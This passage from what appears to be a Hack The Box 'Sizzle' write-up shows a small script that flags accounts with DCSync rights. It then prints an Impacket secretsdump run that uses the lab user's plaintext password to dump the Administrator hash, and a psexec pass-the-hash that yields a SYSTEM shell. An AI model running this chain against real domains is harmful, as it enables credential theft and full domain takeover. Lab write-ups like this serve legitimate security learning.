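    "(OA;;0x100;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1108)"
    "(OA;;0x100;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1108)"  # same pair, hex form
)

if __name__ == "__main__":
    for trustee, why in sorted(dcsync_capable(SAMPLE_SDDL).items()):
        print(f"{trustee:<40} {why}")
```

On a healthy domain the output should contain only Domain Admins, Enterprise Admins, Domain Controllers, Enterprise Domain Controllers, SYSTEM and any legitimately delegated sync accounts (Azure AD Connect, for example); a plain user SID in that list, which is what BloodHound flagged for mrlky here, is the finding.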

secretsdump.py can exercise this remotely over DRSUAPI:

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ secretsdump.py -just-dc mrlky:Football#7@10.10.10.103
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
<SNIP>
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267 htb.local/administrator@10.10.10.103
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file YdQqMrRs.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service CATK on 10.10.10.103.....
[*] Starting service CATK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Closing thoughts

A rewarding box; it taught me how DCSync works.